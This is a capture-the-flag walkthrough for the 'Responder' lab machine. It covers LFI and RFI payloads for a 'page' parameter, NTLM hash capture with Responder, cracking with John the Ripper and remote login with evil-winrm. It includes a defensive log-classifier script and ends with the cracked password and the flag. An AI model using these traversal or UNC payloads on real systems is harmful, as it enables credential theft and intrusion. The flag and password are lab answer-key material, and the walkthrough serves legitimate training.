Responder
Task 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer:
Open a web browser and enter http://[IP].
This redirects you to the subdomain "unika.htb".
Task 2
Which scripting language is being used on the server to generate webpages?
Answer:
Chances are the URL will not respond.
You need to run the following command to add the URL associated with the IP address.
This will make the website available.
After this, click on another link on the main page.
Check the URL and you will notice that index.php is brought up.
Therefore the scripting language used is "php".
Task 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
Answer:
Click on the language link in the upper right-hand corner and pick French.
Now look at the URL and you will notice a parameter named "page", which specifies the language.
Task 4
Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer:
The answer is "../../../../../../../../windows/system32/drivers/etc/hosts"
Task 5
Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer:
The answer is "//10.10.14.6/somefile"
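As an added example (not part of the original walkthrough), this Python sketch shows how a defender could sort values of the "page" parameter seen in web access logs into the categories Tasks 4 and 5 distinguish. The request lines are constructed, the allowlist is an assumption, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed request lines for illustration; not taken from a real log.
SAMPLE_LOG = [
    "GET /index.php?page=french.html HTTP/1.1",
    "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1",
    "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1",
    "GET /index.php?page=%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1",
    "GET /index.php?page=minikatz.exe HTTP/1.1",
]
# Assumption: the site only ever needs a fixed set of page names.
ALLOWED_PAGES = {"french.html"}

def normalise(value):
    """Undo nested percent-encoding and unify path separators."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/").lower()

def classify_page(value):
    """Return a verdict for one value of the `page` parameter."""
    v = normalise(value)
    if v.startswith("//") or re.match(r"^[a-z][a-z0-9+.\-]*://", v):
        return "remote-include"    # UNC path or scheme:// URL
    if ".." in v.split("/") or v.startswith("/") or re.match(r"^[a-z]:", v):
        return "local-traversal"   # leaves the intended directory
    if v in ALLOWED_PAGES:
        return "allowed"
    return "unexpected"            # not on the allowlist, worth review

def scan(request_lines):
    """Return (page value, verdict) for each request carrying `page`."""
    results = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        query = urlsplit(parts[1]).query
        for value in parse_qs(query, keep_blank_values=True).get("page", []):
            results.append((value, classify_page(value)))
    return results

if __name__ == "__main__":
    for value, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:16} {value}")
```

The same allowlist comparison, applied on the server before the parameter reaches the include call, rejects every value here except "french.html".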
Task 6
What does NTLM stand for?
Answer:
New Technology Lan Manager
Task 7
Which flag do we use in the Responder utility to specify the network interface?
Answer:
First, run the following to see what options are available with Responder:
Reading through the documentation, the flag is "-I".
Task 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
Answer:
The answer is "John the ripper"
Task 9
What is the password for the administrator user?
Answer:
Start by initiating Responder with the command below:
This will start a Responder listener. You can specify your IP address at the end.
At the bottom of the output you should find a "Responder IP" value. In this case the one it gave me was 10.10.14.40, but this could be different.
Back in the browser, on the webpage, we want to perform a Remote File Include (RFI) by inputting the following:
Use the IP given to you by Responder here, so keep an eye on it.
Once you hit Enter the page won't resolve, but if you go back to the terminal with the Responder listener, you will see that it captured an authentication.
Now we need to take the authentication it gave us and feed it into John the Ripper to see if it can match it to a password for the Administrator account.
Open a terminal window and run the following to save the hash in a text file:
Next, run it through John the Ripper with the following:
This should return a password of "badminton".
Task 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer:
Start by making sure evil-winrm is installed:
Then run the following command to connect to the Windows machine:
We should now be logged into the Windows account.
If you open a new tab in the terminal and run an nmap scan on all ports, you will find that port "5985" is open and running wsman. This is the answer.
Submit Flag:
From the previous task we should be logged into the Windows system. From here we can list the directories with the "dir" command.
I browsed around and found the flag.txt file in C:\Users\mike\Desktop\flag.txt
Use the "type" command to see the flag.
The flag is "ea81b7afddd03efaa0945333ed147fac"